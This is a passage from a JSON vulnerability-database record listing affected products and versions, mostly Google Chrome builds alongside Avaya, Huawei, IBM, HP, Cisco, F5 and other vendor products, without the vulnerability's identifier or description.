"chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.78" }, { "model": "secureplatform r75.40vs", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.613.0" }, { "model": "espace meeting v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.32" }, { "model": "system networking san96b-5 2498-n96", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.182.2" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.163" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.304" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.162" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77650" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.305" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.0" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.464.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.682.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.15" }, { "model": "protectier enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "services vm", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.940.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.5" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "oceanstor css v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.22" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1683.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.48" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.376.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.50" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1025" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.921.3" }, { "model": "oceanstor uds v100r002c00lvdf0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.17" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "oceanstor s5600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.10" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.538.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.519.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1041.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.69" }, { "model": "high-density server dh321 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.561.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.586.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.93" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "storeever esl g3 tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.766.0" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.740.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.50" }, { "model": "gaia r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.45" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "email and web security appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.6" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.830.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.75" }, { "model": "oceanstor s5500t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.399.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.131" }, { "model": "advanced threat defense", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.2" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.2" }, { "model": "oceanstor s2600t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.925.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.64" }, { "model": "oceanstor n8300 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.864.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.9" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.63" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7765061.090.224.30300" }, { "model": "it business management suite", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "oceanstor s5600t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "t620 plus flexible quad core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.208" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.959.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.106" }, { "model": "oceanstor v100r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.27" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.624.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.40" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.26" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.18" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1293.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.38" }, { "model": "oceanstor s5500 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.698.0" }, { "model": "secureplatform r75.46", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.13" }, { "model": "ipso r71.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1079.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.338" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.598.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.89" }, { "model": "high-density server xh321 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.894.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.30" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "data recovery", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1061" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.737.0" }, { "model": "oceanstor s5800t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.21" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.23" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1672.2" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.52" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9." }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.54" }, { "model": "oceanstor v100r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v1500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.7" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.124" }, { "model": "nsx for vsphere", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3090" }, { "model": "services vm", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.693.0" }, { "model": "oceanstor vtl6900 v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.736.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.4" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9303" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.1.1538" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1069.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.606.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.438.0" }, { "model": "encryption switch 2498-e32", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.3" }, { "model": "oceanstor css v100r001c05", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.120" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.11" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7235" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.209" }, { "model": "idp series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.113" }, { "model": "phaser r14-12 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7800081.150.104.35600" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.226" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.869.0" }, { "model": "dc v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.738.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.231" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "gaia r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.2" }, { "model": "secureplatform r71.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oceanstor s5800t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", 